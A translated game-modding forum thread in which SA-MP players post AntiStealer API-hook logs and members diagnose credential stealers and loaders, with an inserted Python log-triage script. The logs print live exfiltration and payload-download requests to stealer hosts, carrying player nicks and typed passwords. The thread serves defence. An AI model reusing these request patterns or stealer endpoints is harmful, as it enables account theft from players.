Status
No new replies can be posted in this thread.

MAHEKEH

Well-known

Attachments

  • !0AntiStealerByDarkP1xel32.LOG (19.4 KB)

adivvkvns

Well-known
A samp.dat file is being created in the Temp folder.
Help pls. This is really something unknown to science.

the file gets rewritten every game session
in the code I found a collector site with a database
I'm serious
I replaced cleo.asi, put the original back, but I suspect this stealer jumps from file to file

the cleo.asi file size matches the original

UPD: Found those bastards, see the attached photo below!

|>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<|
|> | AntiStealer | V5.2.5 | By DarkP1xel | .LOG File | <|
|> Official Web-Site: https://blast.hk/ <|
|> Subscribe to my YouTube Channel: https://vk.cc/5PCsTe <|
|> Official Topic: https://blast.hk/threads/16018/ <|
|> DONATE: https://qiwi.me/antistealer/ <|
|> KEEP CALM AND SMOKE SOME WEED <|
|> !AntiStealer LOADED! <|
|>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<|

[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [LoadLibraryA] > [C:\GTA SA USA EDITION\CLEO.asi] > {lpLibFileName: C:\Users\Ilya\AppData\Local\Temp\\samp.dat}
[PATCHED] > [LoadLibraryA] > [C:\GTA SA USA EDITION\CLEO.asi] > {lpLibFileName: C:\Users\Ilya\AppData\Local\Temp\\samp.dat}

[WARNING] > [URLDownloadToFileA] > [C:\GTA SA USA EDITION\MoonLoader.asi] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\Ilya\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [URLDownloadToFileW] > [C:\WINDOWS\System32\URLMON.DLL] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\Ilya\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [InternetOpenW] > [C:\WINDOWS\System32\URLMON.DLL] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)}
[WARNING] > [InternetOpenA] > [C:\WINDOWS\System32\WININET.DLL] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)}
[WARNING] > [InternetConnectW] > [C:\WINDOWS\System32\URLMON.DLL] > {lpszServerName: blast.hk | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\WINDOWS\System32\URLMON.DLL] > {lpszObjectName: /moonloader/data/version-info.json}
[PATCHED] > [ZwQueueApcThread] > [C:\WINDOWS\System32\sechost.dll]
[WARNING] > [gethostbyname] > [C:\GTA SA USA EDITION\samp.dll] > {name: Ilya-ПК}
[WARNING] > [URLDownloadToFileA] > [C:\GTA SA USA EDITION\MoonLoader.asi] > {szURL: https://raw.githubusercontent.com/GORYCHsamp/reconupd/master/multiconnect.json | szFileName: C:\Users\Ilya\AppData\Local\Temp\recon_version.json}
[WARNING] > [URLDownloadToFileW] > [C:\WINDOWS\System32\URLMON.DLL] > {szURL: https://raw.githubusercontent.com/GORYCHsamp/reconupd/master/multiconnect.json | szFileName: C:\Users\Ilya\AppData\Local\Temp\recon_version.json}
[WARNING] > [InternetConnectW] > [C:\WINDOWS\System32\URLMON.DLL] > {lpszServerName: raw.githubusercontent.com | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\WINDOWS\System32\URLMON.DLL] > {lpszObjectName: /GORYCHsamp/reconupd/master/multiconnect.json}
[WARNING] > [InternetOpenA] > [C:\GTA SA USA EDITION\SAMPFUNCS.asi] > {lpszAgent: SAMPFUNCS v5.3.3 release #19 (SA-MP 0.3.7)}
[WARNING] > [InternetOpenUrlA] > [C:\GTA SA USA EDITION\SAMPFUNCS.asi] > {lpszUrl: http://service.blasthack.net/sf_sta...E1458321&x=B9909B053E5CD06910E320FA43440F5E5D | lpszHeaders: -}
[PATCHED] > [RtlInitUnicodeString] > [C:\WINDOWS\System32\KERNELBASE.dll] > {SourceString: .\!0AntiStealerByDarkP1xel32.dbg\*}
[PATCHED] > [RtlInitUnicodeStringEx] > [C:\WINDOWS\SYSTEM32\ntdll.dll] > {SourceString: .\!0AntiStealerByDarkP1xel32.dbg\*}
[PATCHED] > [RtlInitUnicodeString] > [C:\WINDOWS\System32\KERNELBASE.dll] > {SourceString: .\!0AntiStealerByDarkP1xel32.pdb\*}
[PATCHED] > [RtlInitUnicodeStringEx] > [C:\WINDOWS\SYSTEM32\ntdll.dll] > {SourceString: .\!0AntiStealerByDarkP1xel32.pdb\*}
 

Attachments

  • Снимок2.PNG (2.2 KB)

DarkP1xel

Willpower is everything.
Thread author
BH Team
> A samp.dat file is being created in the Temp folder.
> Help pls. This is really something unknown to science.
>
> the file gets rewritten every game session
> in the code I found a collector site with a database
> I'm serious
> I replaced cleo.asi, put the original back, but I suspect this stealer jumps from file to file
>
> the cleo.asi file size matches the original
>
> UPD: Found those bastards, see the attached photo below!
Delete the file: C:\Users\Ilya\AppData\Local\Temp\\samp.dat
And the stealer's "loader" itself is in the CLEO folder.
 

Carrentine

Wasted
Note: this user is banned on the forum. Conducting deals with them is not recommended.
> A samp.dat file is being created in the Temp folder.
> Help pls. This is really something unknown to science.
>
> the file gets rewritten every game session
> in the code I found a collector site with a database
> I'm serious
> I replaced cleo.asi, put the original back, but I suspect this stealer jumps from file to file
>
> the cleo.asi file size matches the original
>
> UPD: Found those bastards, see the attached photo below!
About DarkP1xel's CLEO it's complete bullshit, there's nothing in it.
 

Aniki

🐰
Administrator
> I realized I caught a stealer. Every time I launch the game, EBALARAMA.sf and zalupa.asi appear. Help, what do I delete?


[WARNING] > [gethostbyname] > [D:\GTA\SAMPFUNCS\multipack.sf] > {name: darkloader.ru}
[WARNING] > [send] > [D:\GTA\SAMPFUNCS\multipack.sf] > {buf: GET /path.php?id=0032 HTTP/1.1
Host: darkloader.ru
User-Agent: Ashot Samp | 05 region | Kavkaz RP | Prodazha baranov

}
[WARNING] > [gethostbyname] > [D:\GTA\SAMPFUNCS\multipack.sf] > {name: darkloader.ru}
[WARNING] > [send] > [D:\GTA\SAMPFUNCS\multipack.sf] > {buf: GET /link.php?id=0032 HTTP/1.1
Host: darkloader.ru
User-Agent: Ashot Samp | 05 region | Kavkaz RP | Prodazha baranov

}
[WARNING] > [gethostbyname] > [D:\GTA\SAMPFUNCS\multipack.sf] > {name: darkloader.ru}
[WARNING] > [send] > [D:\GTA\SAMPFUNCS\multipack.sf] > {buf: GET /files/32_2.sf HTTP/1.1
Host: darkloader.ru
User-Agent: Ashot Samp | 05 region | Kavkaz RP | Prodazha baranov

}
[WARNING] > [InternetOpenA] > [D:\GTA\d3d9.dll] > {lpszAgent: Mozilla/5.0}
[WARNING] > [InternetOpenUrlA] > [D:\GTA\d3d9.dll] > {lpszUrl: https://www.dropbox.com/s/swjforlg2ofv2xj/ver.txt?dl=1 | lpszHeaders: -}
[WARNING] > [GetAddrInfoW] > [C:\Windows\syswow64\WININET.dll] > {pNodeName: wpad}
[WARNING] > [InternetCreateUrlA] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: www.dropbox.com}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: www.dropbox.com}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: www.dropbox.com}
[WARNING] > [GetAddrInfoExW] > [C:\Windows\syswow64\WININET.dll] > {pName: www.dropbox.com}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: uced5e1c4fea7dac8bdfa68d2cc7.dl.dropboxusercontent.com}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: uced5e1c4fea7dac8bdfa68d2cc7.dl.dropboxusercontent.com}
[WARNING] > [GetAddrInfoExW] > [C:\Windows\syswow64\WININET.dll] > {pName: uced5e1c4fea7dac8bdfa68d2cc7.dl.dropboxusercontent.com}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[WARNING] > [gethostbyname] > [D:\GTA\SAMPFUNCS\multipack.sf] > {name: darkloader.ru}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[WARNING] > [send] > [D:\GTA\SAMPFUNCS\multipack.sf] > {buf: GET /files/32_3.asi HTTP/1.1
Host: darkloader.ru
User-Agent: Ashot Samp | 05 region | Kavkaz RP | Prodazha baranov

}
[WARNING] > [URLDownloadToFileA] > [D:\GTA\MoonLoader.asi] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\user\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\syswow64\urlmon.dll] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\user\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [InternetOpenW] > [C:\Windows\syswow64\urlmon.dll] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)}
[WARNING] > [InternetOpenA] > [C:\Windows\syswow64\WININET.dll] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)}
[WARNING] > [InternetConnectW] > [C:\Windows\syswow64\urlmon.dll] > {lpszServerName: blast.hk | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\Windows\syswow64\urlmon.dll] > {lpszObjectName: /moonloader/data/version-info.json}
[WARNING] > [InternetCreateUrlA] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: blast.hk}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: blast.hk}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: blast.hk}
[WARNING] > [GetAddrInfoExW] > [C:\Windows\syswow64\WININET.dll] > {pName: blast.hk}
[WARNING] > [gethostbyname] > [D:\GTA\samp.dll] > {name: MICROSOFT-PC}
[WARNING] > [gethostbyname] > [D:\GTA\samp.dll] > {name: 51.83.146.10}
[WARNING] > [gethostbyname] > [D:\GTA\samp.dll] > {name: 51.83.146.10}
[WARNING] > [URLDownloadToFileA] > [D:\GTA\SAMPFUNCS.asi] > {szURL: http://op.bitq.eu/cleo/op-hax/OP-HaX_info.php | szFileName: D:\GTA\OP-HaX_info.php}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\syswow64\urlmon.dll] > {szURL: http://op.bitq.eu/cleo/op-hax/OP-HaX_info.php | szFileName: D:\GTA\OP-HaX_info.php}
[WARNING] > [InternetConnectW] > [C:\Windows\syswow64\urlmon.dll] > {lpszServerName: op.bitq.eu | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\Windows\syswow64\urlmon.dll] > {lpszObjectName: /cleo/op-hax/OP-HaX_info.php}
[WARNING] > [InternetCreateUrlA] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[WARNING] > [GetAddrInfoExW] > [C:\Windows\syswow64\WININET.dll] > {pName: op.bitq.eu}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[WARNING] > [gethostbyname] > [D:\GTA\zalupa.asi] > {name: grandsteal.ru}
[WARNING] > [send] > [D:\GTA\zalupa.asi] > {buf: GET /commands.txt HTTP/1.1
Host: grandsteal.ru
User-Agent: Logi norm i Logov toje norm

}
[WARNING] > [URLDownloadToFileA] > [D:\GTA\SAMPFUNCS.asi] > {szURL: https://op.bitq.eu/cleo/op-hax/GiveAccses.php?hwid=[START][Date: 3.11.2019, Time: 16:46:21]ID 1281783249, PC: user, Nick: Santiago_Bernabeo, Srv: 51.83.146.10:8888 | szFileName: D:\GTA\giveaccses.php}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\syswow64\urlmon.dll] > {szURL: https://op.bitq.eu/cleo/op-hax/GiveAccses.php?hwid=[START][Date: 3.11.2019, Time: 16:46:21]ID 1281783249, PC: user, Nick: Santiago_Bernabeo, Srv: 51.83.146.10:8888 | szFileName: D:\GTA\giveaccses.php}
[WARNING] > [InternetConnectW] > [C:\Windows\syswow64\urlmon.dll] > {lpszServerName: op.bitq.eu | lpszUserName: - | lpszPassword: -}
[PATCHED] > [HttpOpenRequestW] > [C:\Windows\syswow64\urlmon.dll] > {lpszObjectName: /cleo/op-hax/GiveAccses.php?hwid=[START][Date: 3.11.2019, Time: 16:46:21]ID 1281783249, PC: user, Nick: Santiago_Bernabeo, Srv: 51.83.146.10:8888}
[WARNING] > [gethostbyname] > [D:\GTA\zalupa.asi] > {name: grandsteal.ru}
[WARNING] > [send] > [D:\GTA\zalupa.asi] > {buf: GET /gate.php?srvr=51.83.146.10:8888&servname=SanTrope%20RolePlay%20%232%20%7C%20BONUS%20X2&log=Santiago_Bernabeo&did=1&inf=%F6%F4%E2%FB%F4%E2%FB%FB%F4%E2&stuid=0379 HTTP/1.1
Host: grandsteal.ru
User-Agent: Misha Logov, Grisha Logov, Sasha Logov, Pasha Logov

}
[WARNING] > [gethostbyname] > [D:\GTA\zalupa.asi] > {name: grandsteal.ru}
[WARNING] > [send] > [D:\GTA\zalupa.asi] > {buf: GET /gate.php?srvr=51.83.146.10:8888&servname=SanTrope%20RolePlay%20%232%20%7C%20BONUS%20X2&log=Santiago_Bernabeo&did=404&inf=/log%20pelmen&stuid=0379 HTTP/1.1
Host: grandsteal.ru
User-Agent: Misha Logov, Grisha Logov, Sasha Logov, Pasha Logov

}
[WARNING] > [gethostbyname] > [D:\GTA\zalupa.asi] > {name: grandsteal.ru}
[WARNING] > [send] > [D:\GTA\zalupa.asi] > {buf: GET /gate.php?srvr=51.83.146.10:8888&servname=SanTrope%20RolePlay%20%232%20%7C%20BONUS%20X2&log=Santiago_Bernabeo&did=404&inf=/log%20pelmen228&stuid=0379 HTTP/1.1
Host: grandsteal.ru
User-Agent: Misha Logov, Grisha Logov, Sasha Logov, Pasha Logov

}
[WARNING] > [URLDownloadToFileA] > [D:\GTA\SAMPFUNCS.asi] > {szURL: https://op.bitq.eu/cleo/op-hax/GiveAccses.php?hwid=[REQ][Date: 3.11.2019, Time: 16:46:43]ID 1281781912, PC: user, Nick: Santiago_Bernabeo, Srv: 51.83.146.10:8888 | szFileName: D:\GTA\giveaccses.php}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\syswow64\urlmon.dll] > {szURL: https://op.bitq.eu/cleo/op-hax/GiveAccses.php?hwid=[REQ][Date: 3.11.2019, Time: 16:46:43]ID 1281781912, PC: user, Nick: Santiago_Bernabeo, Srv: 51.83.146.10:8888 | szFileName: D:\GTA\giveaccses.php}
[WARNING] > [InternetConnectW] > [C:\Windows\syswow64\urlmon.dll] > {lpszServerName: op.bitq.eu | lpszUserName: - | lpszPassword: -}
[PATCHED] > [HttpOpenRequestW] > [C:\Windows\syswow64\urlmon.dll] > {lpszObjectName: /cleo/op-hax/GiveAccses.php?hwid=[REQ][Date: 3.11.2019, Time: 16:46:43]ID 1281781912, PC: user, Nick: Santiago_Bernabeo, Srv: 51.83.146.10:8888}
[WARNING] > [URLDownloadToFileA] > [D:\GTA\SAMPFUNCS.asi] > {szURL: http://op.bitq.eu/cleo/op-hax/PremiumCheck.php | szFileName: D:\GTA\PremiumCheck.php}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\syswow64\urlmon.dll] > {szURL: http://op.bitq.eu/cleo/op-hax/PremiumCheck.php | szFileName: D:\GTA\PremiumCheck.php}
[WARNING] > [InternetConnectW] > [C:\Windows\syswow64\urlmon.dll] > {lpszServerName: op.bitq.eu | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\Windows\syswow64\urlmon.dll] > {lpszObjectName: /cleo/op-hax/PremiumCheck.php}
[WARNING] > [InternetCreateUrlA] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[WARNING] > [URLDownloadToFileA] > [D:\GTA\SAMPFUNCS.asi] > {szURL: https://op.bitq.eu/cleo/op-hax/GiveAccses.php?hwid=[AUTHSUCCSES][Date: 3.11.2019, Time: 16:46:44]ID 1281783249, PC: user, Nick: Santiago_Bernabeo, Srv: 51.83.146.10:8888 | szFileName: D:\GTA\giveaccses.php}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\syswow64\urlmon.dll] > {szURL: https://op.bitq.eu/cleo/op-hax/GiveAccses.php?hwid=[AUTHSUCCSES][Date: 3.11.2019, Time: 16:46:44]ID 1281783249, PC: user, Nick: Santiago_Bernabeo, Srv: 51.83.146.10:8888 | szFileName: D:\GTA\giveaccses.php}
[WARNING] > [InternetConnectW] > [C:\Windows\syswow64\urlmon.dll] > {lpszServerName: op.bitq.eu | lpszUserName: - | lpszPassword: -}
[PATCHED] > [HttpOpenRequestW] > [C:\Windows\syswow64\urlmon.dll] > {lpszObjectName: /cleo/op-hax/GiveAccses.php?hwid=[AUTHSUCCSES][Date: 3.11.2019, Time: 16:46:44]ID 1281783249, PC: user, Nick: Santiago_Bernabeo, Srv: 51.83.146.10:8888}
> In case it matters, I already changed my password via RakBot
> In case it matters, I joined the server via /log, and after logging into the account the game crashed
> Fuck, I already found two of my passwords via F3. But they've already been changed to a different one that isn't in here. Thanks to RakBot
just in case delete everything; judging by the log you swallowed a pile of shit, several stealers at once, and on top of that the loader could have pushed anything at all onto you
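Added example, not code from the thread or from AntiStealer's author: a small Python triage pass over the .LOG format pasted above, flagging the two things the replies point at, a game plugin loading a DLL out of Temp (the samp.dat case) and plugin modules (.sf/.asi) talking to hosts outside an allowlist. The allowlist, the trusted-module set and the abridged sample lines are assumptions of mine, not anything AntiStealer ships.

```python
import re
from urllib.parse import urlsplit

# Added example, not from the thread or the AntiStealer author. Assumed line shape:
#   [LEVEL] > [ApiName] > [C:\path\module] > {param: value | param: value}
# A 'send' entry's {buf: ...} is a raw HTTP request continuing on later lines up to '}'.
LINE_RE = re.compile(r"^\[(?P<level>\w+)\] > \[(?P<api>\w+)\] > \[(?P<module>[^\]]+)\]"
                     r"(?: > \{(?P<params>.*))?$")
HOST_RE = re.compile(r"(?:\bname|lpszServerName|pName|pNodeName|Host|lpszHostName): ([^\s|}]+)")
URL_RE = re.compile(r"(?:szURL|lpszUrl): (\S+)")
LIB_RE = re.compile(r"lpLibFileName: ([^|}]+)")
# Assumed allowlist: hosts the replies treat as ordinary update checks (MoonLoader, SAMPFUNCS).
ALLOWED_HOSTS = {"blast.hk", "service.blasthack.net", "raw.githubusercontent.com"}
TRUSTED_MODULES = {"samp.dll"}  # the SA-MP client resolving the game server is expected
NET_APIS = {"send", "gethostbyname", "GetAddrInfoExW", "InternetConnectW",
            "InternetOpenUrlA", "URLDownloadToFileA", "URLDownloadToFileW"}

# Constructed sample, abridged from the logs pasted in this thread.
SAMPLE_LOG = r"""
[PATCHED] > [LoadLibraryA] > [C:\GTA SA USA EDITION\CLEO.asi] > {lpLibFileName: C:\Users\Ilya\AppData\Local\Temp\\samp.dat}
[WARNING] > [URLDownloadToFileA] > [C:\GTA SA USA EDITION\MoonLoader.asi] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\Ilya\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [gethostbyname] > [D:\GTA\SAMPFUNCS\multipack.sf] > {name: darkloader.ru}
[WARNING] > [gethostbyname] > [D:\GTA\samp.dll] > {name: 51.83.146.10}
[WARNING] > [URLDownloadToFileA] > [D:\GTA\SAMPFUNCS.asi] > {szURL: http://op.bitq.eu/cleo/op-hax/OP-HaX_info.php | szFileName: D:\GTA\OP-HaX_info.php}
[WARNING] > [send] > [D:\GTA\zalupa.asi] > {buf: GET /gate.php?srvr=51.83.146.10:8888&log=Santiago_Bernabeo&did=1 HTTP/1.1
Host: grandsteal.ru
User-Agent: Misha Logov, Grisha Logov

}
"""

def parse_entries(text):
    """Return [(level, api, module, params)], joining a multi-line {buf: ...} request."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = LINE_RE.match(line)
        if m:
            cur = [m["level"], m["api"], m["module"], m["params"] or ""]
            entries.append(cur)
        elif cur is not None and line:
            cur[3] += "\n" + line  # continuation line of the HTTP request buffer
    # drop the closing brace of the {...} parameter block
    return [(l, a, mod, p.rstrip().rstrip("}").rstrip()) for l, a, mod, p in entries]

def hosts_in(params):
    """Every remote host named in a parameter block: host fields, Host: header, or URLs."""
    hosts = set(HOST_RE.findall(params))
    for url in URL_RE.findall(params):
        if urlsplit(url).hostname:
            hosts.add(urlsplit(url).hostname)
    return hosts

def triage(text, allowed_hosts=ALLOWED_HOSTS):
    """Flag DLLs loaded from Temp and game plugins talking to hosts outside the allowlist."""
    findings = set()
    for _level, api, module, params in parse_entries(text):
        mod = module.rsplit("\\", 1)[-1]
        if api.startswith("LoadLibrary"):
            m = LIB_RE.search(params)
            if m and "\\temp\\" in m.group(1).lower():
                findings.add(("load_from_temp", mod, m.group(1).strip()))
            continue
        # system DLLs (urlmon/wininet) only relay the plugin's request; skip them
        if api not in NET_APIS or "\\windows\\" in module.lower() or mod.lower() in TRUSTED_MODULES:
            continue
        for host in hosts_in(params):
            if host not in allowed_hosts:
                findings.add(("unlisted_host", mod, host))
        if api == "send" and params.startswith("buf: "):
            findings.add(("request", mod, params.split("\n", 1)[0][5:]))  # request line
    return sorted(findings)

if __name__ == "__main__":
    for rule, mod, detail in triage(SAMPLE_LOG):
        print(f"{rule:15} {mod:15} {detail}")
```

Running it on the full logs above surfaces multipack.sf, zalupa.asi and SAMPFUNCS.asi by host while MoonLoader's blast.hk update check and samp.dll's server lookups stay quiet.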
 

Ren_Boyko

Well-known
[WARNING] > [gethostbyname] > [D:\GTA\SAMPFUNCS\multipack.sf] > {name: darkloader.ru}
Delete this one; turn on showing hidden files and delete the hidden files in SampFuncs and in the root folder
[WARNING] > [send] > [D:\GTA\zalupa.asi] > {buf: GET /gate.php?
-----------------
And change your account details
Possibly an exe stealer grabbed your cookies too, so hurry
 

Ren_Boyko

Well-known
> After deleting multipack.sf, zalupa.asi stopped being created. By the way, multipack.sf was downloaded from BlastHack. But not that popular MoonLoader, some other one
Well, MultiPack is in luac, but yours is in SF; multipack sf is the loader from the darkloader site, it pulls Grand's stealer onto you... asi, and an exe for sure, so change your passwords for email, VK and so on
 

Ren_Boyko

Well-known
[PATCHED] > [URLDownloadToFileA] > [D:\GTA\SAMPFUNCS.asi] > {szURL: https://op.bitq.eu/cleo/op-hax/GiveAccses.php?hwid=[START][Date: 3.11.2019, Time: 16:55:29]ID 1281783249, PC: user, Nick: Anhel_Birka, Srv: 51.83.146.10:8888 | szFileName: D:\GTA\giveaccses.php}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [URLDownloadToFileA] > [D:\GTA\SAMPFUNCS.asi] > {szURL: https://op.bitq.eu/cleo/op-hax/GiveAccses.php?hwid=[REQ][Date: 3.11.2019, Time: 16:58:54]ID 1281781912, PC: user, Nick: Anhel_Birka, Srv: 51.83.146.10:8888 | szFileName: D:\GTA\giveaccses.php}
[WARNING] > [URLDownloadToFileA] > [D:\GTA\SAMPFUNCS.asi] > {szURL: http://op.bitq.eu/cleo/op-hax/PremiumCheck.php | szFileName: D:\GTA\PremiumCheck.php}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\syswow64\urlmon.dll] > {szURL: http://op.bitq.eu/cleo/op-hax/PremiumCheck.php | szFileName: D:\GTA\PremiumCheck.php}
[WARNING] > [InternetConnectW] > [C:\Windows\syswow64\urlmon.dll] > {lpszServerName: op.bitq.eu | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\Windows\syswow64\urlmon.dll] > {lpszObjectName: /cleo/op-hax/PremiumCheck.php}
[WARNING] > [InternetCreateUrlA] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[PATCHED] > [URLDownloadToFileA] > [D:\GTA\SAMPFUNCS.asi] > {szURL: https://op.bitq.eu/cleo/op-hax/GiveAccses.php?hwid=[AUTHSUCCSES][Date: 3.11.2019, Time: 16:58:54]ID 1281783249, PC: user, Nick: Anhel_Birka, Srv: 51.83.146.10:8888 | szFileName: D:\GTA\giveaccses.php}
> This is what worries me. My nick is in here 3 times. What do I delete? What do I change?
>
> I checked with Malwarebytes and Dr.Web CureIt. Seems they didn't install any exe on me
that's OP-HaX checking your nicks there and so on; check all the GTA folders, if there's no hidden exe, you got lucky
 

Ren_Boyko

Well-known
> Could you please check one last time whether there's anything here. Logged in from an alt account



[WARNING] > [InternetOpenA] > [D:\GTA\d3d9.dll] > {lpszAgent: Mozilla/5.0}
[WARNING] > [InternetOpenUrlA] > [D:\GTA\d3d9.dll] > {lpszUrl: https://www.dropbox.com/s/swjforlg2ofv2xj/ver.txt?dl=1 | lpszHeaders: -}
[WARNING] > [GetAddrInfoW] > [C:\Windows\syswow64\WININET.dll] > {pNodeName: wpad}
[WARNING] > [InternetCreateUrlA] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: www.dropbox.com}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: www.dropbox.com}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: www.dropbox.com}
[WARNING] > [GetAddrInfoExW] > [C:\Windows\syswow64\WININET.dll] > {pName: www.dropbox.com}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: uc69463beea30ffda0b65f3c39cd.dl.dropboxusercontent.com}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: uc69463beea30ffda0b65f3c39cd.dl.dropboxusercontent.com}
[WARNING] > [GetAddrInfoExW] > [C:\Windows\syswow64\WININET.dll] > {pName: uc69463beea30ffda0b65f3c39cd.dl.dropboxusercontent.com}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
[PATCHED] > [ZwOpenProcess] > [C:\Windows\syswow64\KERNELBASE.dll] > {DesiredAccess: 4096}
